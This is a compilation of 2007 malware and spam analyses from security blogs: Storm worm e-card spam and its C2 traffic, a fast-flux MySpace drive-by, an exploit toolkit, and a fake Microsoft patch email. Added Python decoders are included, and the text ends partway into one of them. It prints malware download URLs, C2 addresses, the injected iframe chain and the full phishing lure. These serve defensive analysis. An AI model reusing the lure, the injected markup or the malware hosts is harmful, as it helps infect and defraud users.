Sadly you won't need a surf board for this one.  Just to give you a heads up, there is a new round of emails with malicious links making its way to the inboxes of many folks.  If you haven't gotten one yet, just give it time.  Here is a quick summary of what we have found.

The subject lines of the examples we have gotten have all been identical.  You may have gotten something else.

"Subject: You've received a postcard from a family member!"


The following is an excerpt from the email body.  (WARNING:  Do NOT
FOLLOW THE LINKs below UNLESS YOU KNOW WHAT YOU ARE DOING!!)

--------
OPTION 1
--------

Click on the following Internet address or
copy & paste it into your browser's address box.

http://200.82.187 .228/?08a823e96272575cbc68911e6c36a4

--------
OPTION 2
--------

Copy & paste the ecard number in the "View Your Card" box at
http://200.82.187 .228/

Your ecard number is
08a823e96272575cbc68911e6c36a4



The ecard numbers in the URL above are variable across SPAM samples.

Several additional examples for pattern freaks :):
ee7c634591933434671c16a2e59b1
c3de8293ec6968e3ca03
8517a32e6b9ea6878b15d7703a3b01
7cd64e28cae3d7703a3b01bdad81d9b8
e8293ec6968e3ca036e47840d8e117868911e6
ca9a885b5e6291c3de8293ec6968e3
35601e5ee713076a3db57338
6e47840d8e117868911e6c3

The website has an interesting javascript that appears to have multiple ways to exploit a browser in order to compromise a system.  If javascript is enabled, then you get:

MD5 (tm.exe) = 07276fce39282fd182757d2557f9eca7  which is a downloader that gets this:

MD5 (logi.exe) = 4aa22564a0b886226d8cf14456a598ab

If javascript is disabled, then they provide you a handy link to click on to exploit yourself and you get

MD5 (ecard.exe) = 30051dc10636730e4d6402ef8e88fd04. 

Here is what a user would see:

 "We are currently testing a new browser feature. If you are not able to
view this ecard, please click here (/ecard.exe) to view in its original format."

Here is a listing of just a handful of the tens to hundreds of thousands of infected home systems.  Every Storm-infected system is potentially capable of hosting the malware and sending the SPAM, but only a few will be used in any given SPAM run, depending on how many emails they want sent and how many web hits they're expecting.  You will notice the country/network diversity and the predominance of broadband providers (data courtesy of Team Cymru).

AS    | IP              | BGP Prefix       | CC | Registry | AS Name
5603  | 194.165.121.126 | 194.165.96.0/19  | SI | ripencc  | SIOL-NET SiOL Internet
29737 | 24.192.186.35   | 24.192.184.0/21  | US | arin     | WOW-INTERNET - WideOpenWest
16810 | 67.62.169.71    | 67.62.0.0/16     | US | arin     | CAVTEL02 - Cavalier Telephone
7132  | 69.219.170.133  | 69.208.0.0/12    | US | arin     | SBIS-AS - AT&T Internet Svcs/Ameritech
7132  | 70.232.83.200   | 70.224.0.0/11    | US | arin     | SBIS-AS - AT&T Internet Svcs/SBC Global
3320  | 84.133.236.88   | 84.128.0.0/10    | DE | ripencc  | DTAG Deutsche Telekom/Dialin.net
12392 | 85.27.49.108    | 85.27.48.0/22    | BE | ripencc  | ASBRUTELE AS/Brutele SC
21502 | 85.69.86.171    | 85.69.0.0/16     | FR | ripencc  | ASN-NUMERICABLE/Modulonet.fr
18881 | 201.47.44.156   | 201.47.32.0/19   | BR | lacnic   | Global Village Telecom
25515 | 213.140.230.102 | 213.140.224.0/19 | RU | ripencc  | CTCNET-AS Joint-Stock Central Telecom.
8642  | 85.226.199.228  | 85.224.0.0/13    | SE | ripencc  | B2 B2 Bredband/bredbandsbolaget.se

As you can see, detection is skimpy at this point.  The key detect below is "Tibs" (aka Storm/Nuwar/Peacomm/Peed).

Complete scanning result of "ecard.exe", received in VirusTotal at 06.28.2007, 21:24:37 (CET).

Antivirus Version Update Result
AhnLab-V3 2007.6.27.0 06.28.2007  no virus found
AntiVir 7.4.0.34 06.28.2007 HEUR/Crypted
Authentium 4.93.8 06.27.2007  no virus found
Avast 4.7.997.0 06.27.2007  no virus found
AVG 7.5.0.476 06.28.2007  no virus found
BitDefender 7.2 06.28.2007  no virus found
CAT-QuickHeal 9.00 06.27.2007  no virus found
ClamAV devel-20070416 06.28.2007  no virus found
DrWeb 4.33 06.28.2007  no virus found
eSafe 7.0.15.0 06.27.2007 Suspicious Trojan/Worm
eTrust-Vet 30.8.3747 06.28.2007  no virus found
Ewido 4.0 06.27.2007  no virus found
FileAdvisor 1 06.28.2007  no virus found
Fortinet 2.91.0.0 06.28.2007  no virus found
F-Prot 4.3.2.48 06.28.2007  no virus found
F-Secure 6.70.13030.0 06.28.2007 Tibs.gen118
Ikarus T3.1.1.8 06.28.2007  no virus found
Kaspersky 4.0.2.24 06.28.2007  no virus found
McAfee 5062 06.27.2007  no virus found
Microsoft 1.2701 06.28.2007  no virus found
NOD32v2 2360 06.28.2007  no virus found
Norman 5.80.02 06.27.2007 Tibs.gen118
Panda 9.0.0.4 06.28.2007 Suspicious file
Sophos 4.19.0 06.24.2007  no virus found
Sunbelt 2.2.907.0 06.27.2007 VIPRE.Suspicious
Symantec 10 06.28.2007  no virus found
TheHacker 6.1.6.140 06.28.2007  no virus found
VBA32 3.12.0.2 06.27.2007  no virus found
VirusBuster 4.3.23:9 06.27.2007  no virus found
Webwasher-Gateway 6.0.1 06.28.2007 Heuristic.Crypted

Aditional Information
File size: 7915 bytes
MD5: 30051dc10636730e4d6402ef8e88fd04
SHA1: 05368309bf89a78d680e239f58ec39bb0f8963b6

 Update1:


If JavaScript is disabled and a user downloads /ecard.exe (hosted on the IP mentioned in the spam) and executes it:

ecard.exe connects to 66.148.74.35 on port 80/TCP.
14361 | 66.148.74.35 | 66.148.64.0/19 | US | arin | HOPONE-GLOBAL - HopOne Internet Corporation

Our testing hasn't resulted in a secondary malware download by ecard.exe yet.
However, here are two malicious URLs on this IP reported via CastleCops in May
(http://www.castlecops.com/p945429-omega_it_ru.html):

http://66.148.74 .35/aff/dir/sony.exe
http://66.148.74 .35/aff/dir/pdp.exe

Notice the "/aff/dir/" path.

If JavaScript is enabled, a download (from the IP in the spam) and execution is attempted:
urlRealExe = http://200.82.187 .228/file.php
XMLHttpDownload(v[0], urlRealExe)

If that fails, an exploit routine is started in order to cause the download:
startOverflow(0)

There are 3 exploits available and they are tried in order.
The first one is for QuickTime.
If that fails, a WinZip exploit is attempted.
If that fails, the "hail mary" is the WebViewFolderIcon exploit.

Assuming the file is downloaded and executed, it calls home to 75.126.21.162 (75.126.21.162-static.reverse.kosmohost.net) on port 80/TCP:
36351 | 75.126.21.162 | 75.126.0.0/17 | US | arin | SOFTLAYER - SoftLayer Technologies Inc

This IP may look familiar to many. It's been doing its bad thing since at least December 2006.
And here are a number of domains mapped to this IP that might look familiar:
2007postcards.com
jokeonlineworld.com
practicaljokeonline.com
postcardsbargain.com
freewebpostcards.com
mailfreepostcards.com
ecolorpostcards.com

Here's the initial call home (notice the "/aff/" path):

 TCP Conversation from <infected pc>:1066 to 75.126.21.162:80
Data sent:    
   
4745 5420 2f61 6666 2f63 6e74 722e 7068    GET /aff/cntr.ph
703f 623d 3e40 3e3d 2663 3d37 3937 3626    p?b=>@>=&c=7976&
643d 3132 3220 4854 5450 2f31 2e31 0d0a    d=122 HTTP/1.1..
4163 6365 7074 3a20 2a2f 2a0d 0a41 6363    Accept: */*..Acc
6570 742d 456e 636f 6469 6e67 3a20 677a    ept-Encoding: gz
6970 2c20 6465 666c 6174 650d 0a55 7365    ip, deflate..Use
722d 4167 656e 743a 204d 6f7a 696c 6c61    r-Agent: Mozilla
2f34 2e30 2028 636f 6d70 6174 6962 6c65    /4.0 (compatible
3b20 4d53 4945 2036 2e30 3b20 5769 6e64    ; MSIE 6.0; Wind
6f77 7320 4e54 2035 2e31 3b20 5356 3129    ows NT 5.1; SV1)
0d0a 486f 7374 3a20 3735 2e31 3236 2e32    ..Host: 75.126.2
312e 3136 320d 0a43 6f6e 6e65 6374 696f    1.162..Connectio
6e3a 204b 6565 702d 416c 6976 650d 0a0d    n: Keep-Alive...
0a                                         .


Here's our encoded reply:

75.126.21.162:80 to <infected pc>:1066
Data received:    
   
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a53 6572 7665 723a 206e 6769 6e78 2f30    .Server: nginx/0
2e35 2e31 320d 0a44 6174 653a 2054 6875    .5.12..Date: Thu
2c20 3238 204a 756e 2032 3030 3720 3231    , 28 Jun 2007 21
3a30 353a 3539 2047 4d54 0d0a 436f 6e74    :05:59 GMT..Cont
656e 742d 5479 7065 3a20 7465 7874 2f68    ent-Type: text/h
746d 6c0d 0a54 7261 6e73 6665 722d 456e    tml..Transfer-En
636f 6469 6e67 3a20 6368 756e 6b65 640d    coding: chunked.
0a43 6f6e 6e65 6374 696f 6e3a 206b 6565    .Connection: kee
702d 616c 6976 650d 0a58 2d50 6f77 6572    p-alive..X-Power
6564 2d42 793a 2050 4850 2f35 2e32 2e31    ed-By: PHP/5.2.1
0d0a 0d0a 3366 0d0a 3f40 463c 3f41 3e3c    ....3f..?@F<?A><
443e 3c3f 440a 333a 3a35 3537 3933 0a33    D><?D.3::55793.3
0a69 7575 713b 3030 3836 2f32 3337 2f33    .iuuq;0086/237/3
322f 3237 3330 6267 6730 656a 7330 6d70    2/2730bgg0ejs0mp
686a 2f66 7966 0a0d 0a30 0d0a 0d0a         hj/fyf...0....
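The reply above is readable once the scheme is spotted: every byte of the chunked body except the newline separators has been shifted up by one (h became i, / became 0, and so on), so subtracting one recovers plain text, and the last line becomes exactly the URL the infected PC requests next. The following is an added example, not code from the diary or from the handlers: it parses the hex dump as printed above, de-chunks the HTTP body and undoes the shift. The diary does not say what the first three decoded lines mean, and the example does not interpret them.

```python
import re

# Hex dump of the encoded C2 reply, copied from the capture above.  Only the
# hex columns are kept; the ASCII column on the right has been dropped.
C2_REPLY_HEXDUMP = """
4854 5450 2f31 2e31 2032 3030 204f 4b0d
0a53 6572 7665 723a 206e 6769 6e78 2f30
2e35 2e31 320d 0a44 6174 653a 2054 6875
2c20 3238 204a 756e 2032 3030 3720 3231
3a30 353a 3539 2047 4d54 0d0a 436f 6e74
656e 742d 5479 7065 3a20 7465 7874 2f68
746d 6c0d 0a54 7261 6e73 6665 722d 456e
636f 6469 6e67 3a20 6368 756e 6b65 640d
0a43 6f6e 6e65 6374 696f 6e3a 206b 6565
702d 616c 6976 650d 0a58 2d50 6f77 6572
6564 2d42 793a 2050 4850 2f35 2e32 2e31
0d0a 0d0a 3366 0d0a 3f40 463c 3f41 3e3c
443e 3c3f 440a 333a 3a35 3537 3933 0a33
0a69 7575 713b 3030 3836 2f32 3337 2f33
322f 3237 3330 6267 6730 656a 7330 6d70
686a 2f66 7966 0a0d 0a30 0d0a 0d0a
"""


def hexdump_to_bytes(dump: str) -> bytes:
    """Turn the whitespace-separated hex words back into raw bytes."""
    return bytes.fromhex("".join(dump.split()))


def split_http_response(raw: bytes):
    """Separate status line, headers (lower-cased names) and body of a raw HTTP/1.1 response."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line, *header_lines = head.split(b"\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("ascii")] = value.strip().decode("ascii")
    return status_line.decode("ascii"), headers, body


def dechunk(body: bytes) -> bytes:
    """Reassemble a Transfer-Encoding: chunked body (hex size line, data, CRLF, ..., a 0 chunk)."""
    out = bytearray()
    pos = 0
    while True:
        line_end = body.index(b"\r\n", pos)
        size = int(body[pos:line_end].split(b";")[0], 16)  # ignore any chunk extension
        pos = line_end + 2
        if size == 0:
            break
        out += body[pos:pos + size]
        pos += size + 2  # skip the chunk data and the CRLF that follows it
    return bytes(out)


def shift_decode(data: bytes, shift: int = 1) -> str:
    """Undo the bot's encoding: every byte except the newline separator is shifted by `shift`."""
    return "".join(chr(b) if b == 0x0A else chr((b - shift) % 256) for b in data)


def decode_c2_reply(dump: str = C2_REPLY_HEXDUMP):
    """Return (headers, non-empty decoded body lines) for the captured reply."""
    _, headers, body = split_http_response(hexdump_to_bytes(dump))
    if headers.get("transfer-encoding", "").lower() == "chunked":
        body = dechunk(body)
    return headers, [ln for ln in shift_decode(body).split("\n") if ln]


def download_urls(dump: str = C2_REPLY_HEXDUMP):
    """Only the decoded lines that are URLs, i.e. the files the bot is told to fetch."""
    _, lines = decode_c2_reply(dump)
    return [ln for ln in lines if re.match(r"https?://", ln)]


if __name__ == "__main__":
    headers, lines = decode_c2_reply()
    print(headers["server"], headers["x-powered-by"])
    for ln in lines:
        print(repr(ln))
    print(download_urls())
```

Run stand-alone it prints the nginx/PHP banner from the headers, the four decoded lines and the single recovered URL, http://75.126.21.162/aff/dir/logi.exe, which is the GET that follows in the capture. The same de-chunk-then-shift pass can be pointed at any later reply from the same host to see which file the zombie is being told to fetch.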

Here is the PC acting on the command and requesting a file download
(GET /aff/dir/logi.exe)

<infected pc>:1066 to 75.126.21.162:80
Data sent:    

4745 5420 2f61 6666 2f64 6972 2f6c 6f67    GET /aff/dir/log
692e 6578 6520 4854 5450 2f31 2e31 0d0a    i.exe HTTP/1.1..
4163 6365 7074 3a20 2a2f 2a0d 0a41 6363    Accept: */*..Acc
6570 742d 456e 636f 6469 6e67 3a20 677a    ept-Encoding: gz
6970 2c20 6465 666c 6174 650d 0a55 7365    ip, deflate..Use
722d 4167 656e 743a 204d 6f7a 696c 6c61    r-Agent: Mozilla
2f34 2e30 2028 636f 6d70 6174 6962 6c65    /4.0 (compatible
3b20 4d53 4945 2036 2e30 3b20 5769 6e64    ; MSIE 6.0; Wind
6f77 7320 4e54 2035 2e31 3b20 5356 3129    ows NT 5.1; SV1)
0d0a 486f 7374 3a20 3735 2e31 3236 2e32    ..Host: 75.126.2
312e 3136 320d 0a43 6f6e 6e65 6374 696f    1.162..Connectio
6e3a 204b 6565 702d 416c 6976 650d 0a0d    n: Keep-Alive...
0a                                         .

Here comes the new malware binary that will be executed:

75.126.21.162:80 to <infected pc>:1066
Data received:    
   
4854 5450 2f31 2e31 2032 3030 204f 4b0d    HTTP/1.1 200 OK.
0a53 6572 7665 723a 206e 6769 6e78 2f30    .Server: nginx/0
2e35 2e31 320d 0a44 6174 653a 2054 6875    .5.12..Date: Thu
2c20 3238 204a 756e 2032 3030 3720 3231    , 28 Jun 2007 21
3a30 353a 3539 2047 4d54 0d0a 436f 6e74    :05:59 GMT..Cont
656e 742d 5479 7065 3a20 6170 706c 6963    ent-Type: applic
6174 696f 6e2f 6f63 7465 742d 7374 7265    ation/octet-stre
616d 0d0a 436f 6e6e 6563 7469 6f6e 3a20    am..Connection:
6b65 6570 2d61 6c69 7665 0d0a 436f 6e74    keep-alive..Cont
656e 742d 4c65 6e67 7468 3a20 3133 3338    ent-Length: 1338
3637 0d0a 4c61 7374 2d4d 6f64 6966 6965    67..Last-Modifie
643a 2054 6875 2c20 3238 204a 756e 2032    d: Thu, 28 Jun 2
3030 3720 3138 3a30 343a 3435 2047 4d54    007 18:04:45 GMT
0d0a 4163 6365 7074 2d52 616e 6765 733a    ..Accept-Ranges:
2062 7974 6573 0d0a 0d0a 4d5a 9000 0300     bytes....MZ....
0000 0400 0000 ffff 0000 b800 0000 0000    ................
0000 4000 0000 0000 0000 0000 0000 0000    ..@.............
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 e000 0000 0e1f ba0e 00b4    ................
09cd 21b8 014c cd21 5468 6973 2070 726f    ..!..L.!This pro
6772 616d 2063 616e 6e6f 7420 6265 2072    gram cannot be r
756e 2069 6e20 444f 5320 6d6f 6465 2e0d    un in DOS mode..


OK, so now they're in business. Here is the peers file Storm needs to get the new zombie bootstrapped into the P2P botnet:

C:\WINDOWS\system32\windev-peers.ini

And now we're off to the UDP races, with Storm P2P activity flowing over a number of high, random UDP ports as well as a few
more recognizable Storm UDP ports:
7871
16275
11275
11271

And finally, here are a few more of the malware hosting servers they've relied on in recent months in addition to the HopOne and Softlayer host above:

27645 | 205.209.179.15 | 205.209.128.0/18 | US | arin | ASN-NA-MSG-01 - Managed Solutions Group, Inc
27595 | 216.255.189.214 | 216.255.176.0/20 | US | arin | INTERCAGE - InterCage, Inc
14361 | 66.148.74.7 | 66.148.64.0/19 | US | arin | HOPONE-DCA - HopOne Internet Corporation
36351 | 75.126.21.162 | 75.126.0.0/17 | US | arin | SOFTLAYER - SoftLayer Technologies Inc
36351 | 75.126.226.224 | 75.126.0.0/16 | US | arin | SOFTLAYER - SoftLayer Technologies Inc

 

Most excellent analysis provided by Anubis.

SANS ISC Handlers

Source: SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc

 

Zero Day Threats: Part 3 - When & How Are They Released?

Tuesday June 26, 2007 at 9:16 am CST
Posted by Craig Schmugar


In part 2 of this blog series, I touched on the profile and motivations of those behind Zero Day Threats.  In part 3, we’ll take a look at when and how these threats are released/discovered.

In 2003, Microsoft moved to a monthly patch release cycle (commonly known as Patch Tuesday, for the second Tuesday of each month).  After a while, people noticed a correlation between when zero day vulnerabilities were discovered/disclosed and their proximity to Patch Tuesday.  Some concluded that many zero day threats are strategically released very close to Patch Tuesday as a means to maximize the Window of Vulnerability (the time during which an attacker can take advantage of a yet-to-be-patched vulnerability).  To test this theory, I took a look at some 200 Microsoft zero day vulnerabilities since January 2005, tracking when they were discovered relative to the closest Patch Tuesday.  You may be asking, 200 Microsoft zero day vulnerabilities since January 2005?!?  While some consider local denial-of-service vulnerabilities not to be zero days, I’ll defer to my previous definition, which was used for the purpose of creating the chart below:

The public availability of exploit information on the same day that a vulnerability is publicly disclosed.

This chart plots the proximity of discovery from the closest Patch Tuesday.

This data can be broken down as follows:

  • In 2005,   7 (18%) Zero Day threats were discovered ±3 days of Patch Tuesday.
  • In 2006, 36 (31%) Zero Day threats were discovered within the same time frame.
  • In 2007, 10 (24%) Zero Day threats were discovered within the same time frame (as of April 15)

NOTE: ±3 days is a 7 day window.  Given an even distribution, one would expect to find 23% of all vulnerabilities during this window.  The data suggests that at least in 2005 and 2007 strategic releases were not that common; and even 2006 only showed an 8% deviation.
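The proximity measurement and the 23% baseline described above, as an added worked example (not code from the original post): it locates the second Tuesday of a month, measures a discovery date's signed distance to the closest Patch Tuesday, and computes what share of a set of dates falls inside the ±3 day window, next to the share a uniform distribution would give. The discovery dates in the block are constructed for illustration and are not the author's 200-vulnerability dataset.

```python
import calendar
from datetime import date


def patch_tuesday(year: int, month: int) -> date:
    """Second Tuesday of the month (Microsoft's monthly release day since 2003)."""
    first_weekday = calendar.monthrange(year, month)[0]          # Monday == 0
    days_to_first_tuesday = (calendar.TUESDAY - first_weekday) % 7
    return date(year, month, 1 + days_to_first_tuesday + 7)


def _prev_month(year: int, month: int):
    return (year - 1, 12) if month == 1 else (year, month - 1)


def _next_month(year: int, month: int):
    return (year + 1, 1) if month == 12 else (year, month + 1)


def offset_from_closest_patch_tuesday(day: date) -> int:
    """Signed distance in days to the nearest Patch Tuesday.

    Negative: the zero day surfaced that many days before the coming Patch Tuesday.
    Positive: that many days after the previous one.  A tie goes to the coming one.
    """
    candidates = [
        patch_tuesday(*_prev_month(day.year, day.month)),
        patch_tuesday(day.year, day.month),
        patch_tuesday(*_next_month(day.year, day.month)),
    ]
    offsets = [(day - pt).days for pt in candidates]
    return min(offsets, key=lambda d: (abs(d), d))


def offset_on(year: int, month: int, day: int) -> int:
    """Convenience wrapper taking a calendar date as three integers."""
    return offset_from_closest_patch_tuesday(date(year, month, day))


def within_window(day: date, radius: int = 3) -> bool:
    """True when the date lies within ±radius days of a Patch Tuesday."""
    return abs(offset_from_closest_patch_tuesday(day)) <= radius


def uniform_window_share(radius: int = 3) -> float:
    """Share of days inside ±radius of Patch Tuesday if discovery dates were spread evenly."""
    window = 2 * radius + 1                  # ±3 days is a 7-day window
    mean_month_length = 365.25 / 12          # about 30.44 days
    return window / mean_month_length        # about 0.23 for the default window


def window_share(discovery_dates, radius: int = 3):
    """(count, fraction) of the given discovery dates that fall inside the window."""
    hits = sum(within_window(d, radius) for d in discovery_dates)
    return hits, hits / len(discovery_dates)


# Constructed discovery dates for illustration only; not the post's dataset.
CONSTRUCTED_DISCOVERY_DATES = [
    date(2007, 1, 10),   # one day after the January Patch Tuesday (Jan 9)
    date(2007, 2, 20),   # a week after February's (Feb 13)
    date(2007, 3, 29),   # twelve days before April's (Apr 10)
    date(2007, 4, 12),   # two days after April's
]


if __name__ == "__main__":
    for d in CONSTRUCTED_DISCOVERY_DATES:
        print(d, offset_from_closest_patch_tuesday(d), within_window(d))
    hits, frac = window_share(CONSTRUCTED_DISCOVERY_DATES)
    print(f"observed: {hits} of {len(CONSTRUCTED_DISCOVERY_DATES)} ({frac:.0%})")
    print(f"expected under a uniform spread: {uniform_window_share():.0%}")
```

The observed share is what the post's yearly percentages are; comparing it with uniform_window_share() is the step behind the note that 23% would be expected by chance, so only an excess over that figure says anything about timing.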

There is another significant factor to consider: vulnerabilities discovered through active exploitation have been erroneously assigned the date of disclosure, rather than the date of release.  Of course there is a good reason for this: the release date is not always known.  There have been cases in the past where server logs showed evidence of zero day vulnerabilities being uploaded well in advance of the discovery date.

The following chart represents the number and method that zero day threats were discovered/disclosed when comparing two six month periods:

Roughly 10% of all vulnerabilities were first discovered through active exploitation.  While a significant number (42%) of these were discovered within the ±3 day window, we don’t know the actual release date for many of them.

So where does this leave us?  Well, undoubtedly some attackers are waiting for the right moment to strike, but this is somewhat akin to trying to sell stock at its peak price.  Attackers can’t really know how long their zero day threat will go unnoticed, when it will be reported to the vendor, patched, etc.  They can be sure that if they release their threat within a few days before Patch Tuesday, Microsoft would have to pull off something that has yet to happen to date: the release of an emergency patch in under 6 days.  If they release, say, 10 days before Patch Tuesday, it’s a gamble that the threat will go unnoticed for at least a few days before being reported to Microsoft.  Of course they could wait until just after Patch Tuesday to release, but by doing so they would fail to maximize the duration of effectiveness.

It’s more likely that many attackers do not wait and simply release their threats as soon as they are ready to be released.  The more time that passes, the greater the chance that the vulnerability will be disclosed and/or patched.

Check back later in the week for the 4th and final part of this blog series.

Source: Computer Security Research - McAfee Avert Labs Blog

 

All roads lead to TROJ_SMALL.FXD

June 27th, 2007 by Jasper Pimentel

We’ve received reports of a web threat toolkit similar to WebAttacker and MPack being hosted at a particular domain. This new toolkit utilizes a variety of exploits to download TROJ_SMALL.FXD into the affected system. We’ve checked several obfuscated PHP files contained within a directory behind this domain and so far, here’s what we have on this new threat:

Through IFRAME tags, a file called INDEX.PHP loads other webpages located in the same directory: Z-CS-AN.HTM, Z-JAVA1.PHP, Z-014-2.PHP, Z-CREATE-O.PHP, Z-014-1.PHP, and Z-PNG-OV.PHP

Z-CS-AN.HTM is an HTML file that loads FILE.JPG (also located in the same directory) as an animated cursor. Through FILE.JPG, it exploits the animated cursor vulnerability in Windows, similar to ANICMOO. FILE.JPG is already detected by Trend as EXPL_ANICMOO.GEN. Further inspection of the file reveals a download location, and the executable file that is retrieved from this location (FILE.EXE) is actually a Trojan downloader that is detected by Trend as TROJ_SMALL.FXD.

Z-JAVA-1.PHP makes use of a .JAR file that contains malicious Java classes compiled as web page applets. These applets are detected by Trend as JAVA_BYTEVER. It exploits the ByteVerifier vulnerability in unpatched versions of the Microsoft (MS) Java Virtual Machine, which could allow a file to be downloaded and executed without a user’s knowledge. Through the use of this exploit, TROJ_SMALL.FXD is downloaded.

Z-014-2.PHP, Z-CREATE-O.PHP and Z-014-1.PHP contain obfuscated JavaScript and VBScript code. All of them have similar content in terms of functionality, which is to download and execute TROJ_SMALL.FXD. These 3 PHP files differ in the method they use to download the malware and in how they rename its file once it is successfully downloaded to the affected system.

Z-PNG-OV.PHP exploits the vulnerability indicated in MS06-024 using the PNG file residing in the same directory. A remote code execution vulnerability exists in Windows Media Player due to the way it handles the processing of PNG images. Through the use of this exploit, TROJ_SMALL.FXD is downloaded.


In summary, this particular web threat toolkit makes sure that TROJ_SMALL.FXD is downloaded regardless of the method or exploit used. Most of the vulnerabilities exploited are nothing new, so be sure to patch your systems as a security measure.

These files have been sent to the proper channels so that an appropriate solution can be deployed. We’ll keep you posted for updates.

Source: TrendLabs | Malware Blog - by Trend Micro

 

PDF Spam Outbreak

Tuesday June 26, 2007 at 8:44 am CST
Posted by Nick Kelly


A large “pump-and-dump” stock spam campaign is underway, but rather than including the content of the spam in an image file, this campaign includes the spam content within a .PDF file. The stock spam is believed to be sent from Stration infected computers, as this spam campaign closely followed a new W32/Stration worm mass-mailing which contained a number of .PDF files, and Stration has been associated with pump and dump spam in the past.

The current spam contains one or more .PDF files, has a randomly generated subject line and sender name, and a blank message body. The .PDF files contain images which look very similar to previous image based stock spam. 

PDF Image spam

The appearance of PDF-based spam was predicted by AVERT in the article “Email Spam Plague Persists” in the latest SAGE report, as .PDF files can be more easily automated than other document formats. This prediction appears to be holding true, and as .GIF based image spam continues to decline we expect spammers will continue to try similar methods of sending image based spam.

Source: Computer Security Research - McAfee Avert Labs Blog

 

MySpace Flux Malware

Published: 2007-06-26,
Last Updated: 2007-06-26 22:44:49 UTC
by Johannes Ullrich (Version: 2)

CAREFUL! This diary contains links to malicious code!

A number of MySpace profiles include drive-by exploits.  The exploits will install a version of "flux bot", a very popular proxy network bot.

FluxBot (aka "Fast-Flux") is typically used to hide phishing and malware delivery sites behind complex, ever-changing networks of proxy servers. A system infected with FluxBot will be used as one of these proxies.

Infected MySpace "Friend IDs": 39184135, 171598920, 22057010

A typical excerpt from an infected profile (obfuscated to protect the innocent):

<a style="text-decoration:none;;top:1px;left:1px;"
href="http://home. myspace. com. index. cfm. fuseaction.user.MyToken.
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.dusanbut.com/login.php"><img
style="border-width:0px;width:1280px;height:220px;"
src="http://x.myspace.com/images/clear.gif"></a></style>

   The actual exploit / malware is served via an existing flux network. *.dusanbut.com will redirect the user to an encoded javascript which decodes to:

<script>window.status="Done"</script>
    <iframe src="http://fafb4c4c .com/header_03.gif" width=1
height=1></iframe>
   The domain used here is, of course, again served via flux. header_03.gif in turn yields:
<script>window.status="Done"</script>
    <iframe src="http://fafb4c4c .com/routine.php" width=1
height=1></iframe>

   Are we there yet? Yup, just one more (patched) Internet Explorer exploit to go. The
exploit will install the .exe. For example:
(Warning: live malware URLs, visit at your own risk)

http://fafb4c4c .com/session.exe (this is just the downloader stub)
The downloader will now retrieve the actual bot. We have seen, among others, these
URLs:
http://www.myfiles .hk/exes/webdl3x/weby.exe
http://www.myfiles .hk/exes/webdl3x/oly.exe

Settings for the bot can be found here:
http://settings.iconnectyou .biz
http://fcs.camgenie .com/weby7.exe

Once it's all said and done, you will be a proud new member of the flux net, and soon you
will find your system participating in phishing and similar endeavours.
A couple of IPs that may be worthwhile to block:
AS13767   | 72.232.254.218 
AS15083   | 65.111.176.176
AS25761   | 72.20.18.86    
AS25761   | 72.20.6.10   
As you can imagine, it's a lot of messy work to decode all of this. I am just the messenger. This is work done by members of our great handler team.

SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc

 

Published: 2007-06-26,
Last Updated: 2007-06-26 21:53:12 UTC
by donald smith (Version: 2)

Several of our readers reported an email that led to a fake Microsoft patch being spammed on the net today. The email had their full names and, in one case, the company they worked for included in the body of the email. So far I have seen 4 different URLs. We are working on getting the systems hosting the malware cleaned or shut down. We have submitted the malware itself to most of the AV vendors, so detection should improve, but currently it is not detected.

Thanks go out to PatrickC, TroyP, NathanM, BruceD and CalebC.

You can see in the body of the email below that the spelling is bad and the license key is not in the right format for XP nor Outlook.

Microsoft pointed us to a couple of web pages they maintain that should help you recognize fraudulent email:

http://www.microsoft.com/protect/yourself/phishing/msemail.mspx

 http://www.microsoft.com/canada/athome/security/email/ms_genuine_mail.mspx

One of the submitters “PatrickC” provided the following email for a fake Microsoft patch and malware site.  

“The following email I received is new to me. The URL points to
hxxp://fake.microsoft.site./
MSOUTRC2007Update-KB863892.exe
Bye.”
==Sanitized email header==============
X-Envelope-To: <patrick >
<SNIP to protect Patrick >
Date: Tue, 26 Jun 2007 14:51:39 +0200
Precedence: bulk
To: Patrick 
Subject: Microsoft Security Bulletin MS07-0065 - Critical Update
From: "Microsoft Corp." <update@microsoft.com>
Content-Type: text/html; charset=iso-8859-1
Message-Id: <E1I3AWB-00010F-00@s137553944.websitehome.co.uk>
X-Antivirus: avast! (VPS 000752-0, 2007-06-25), Inbound message
X-Antivirus-Status: Clean 
Microsoft.com Home |
| Windows Family | Windows Marketplace | Office Family | Microsoft Update  
Dear Patrick

You are receiving this message because you are using Genuine Microsoft Software and your e-mail address has been subscribed to the Microsoft Windows Update mailing list.

A new 0-day vulnerability has appeared in the wild and was reported for the first time Monday, June 18th. The vulnerability affects machines running MICROSOFT OUTLOOK and allows an attacker to take full control of the vulnerable computer if the exploitation process is succesfull.

Since then, more than 100,000 machines have been reported as exploited and used to promote spammy pharmacy products such as viagra and cialis.

An update has been released to fix this issue and can be downloaded from the following link :

http://windowsupdate.microsoft.com/outlook/upd ate-0-day/download.aspx?id=63852

Quick Details
File Name: MSOUTRC2007Update-KB863892.exe
Version: 3.1.1023
Date Published: 06/25/2007
Download Size: 20 Kb
Estimated Download Time: 1 sec

It's urgent to download and install the update as soon as possible in order to decrease the number of succesfull attacks that occure each day. The update is only available for Genuine Versions of Microsoft Outllok. 
Instructions :  
1. Click the link above to start the download
2. Save the update in your WINDOWS directory and run it from there.If you want to start the installation immediately click Run in the download box, after you click the link.
3. After you run it, the update will download the security packages required to patch Microsoft Outlook.The entire process will take around 10-15 minutes, and you'll receive a confirmation message once the update process is completed.

Your Microsoft Windows Licence Information is :

REG ISTERED TO : Patrick
Licence KEY : XXXXX-XXXXX-XXXXX-XXXXX-XXXXX

Thank you

Microsoft Corp.

=====================================
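Two of the tells in the message above can be checked mechanically: the From: header claims microsoft.com while the Message-Id was generated at a websitehome.co.uk host, and the bulletin identifier in the subject (MS07-0065) does not follow Microsoft's MSyy-nnn bulletin numbering. The following is an added example, not part of the diary, that parses the sanitized header block quoted above and reports both mismatches. The second, clean header set is constructed for contrast, and the checks are mail-triage heuristics, not a phishing verdict on their own.

```python
import re
from email import message_from_string
from email.utils import parseaddr

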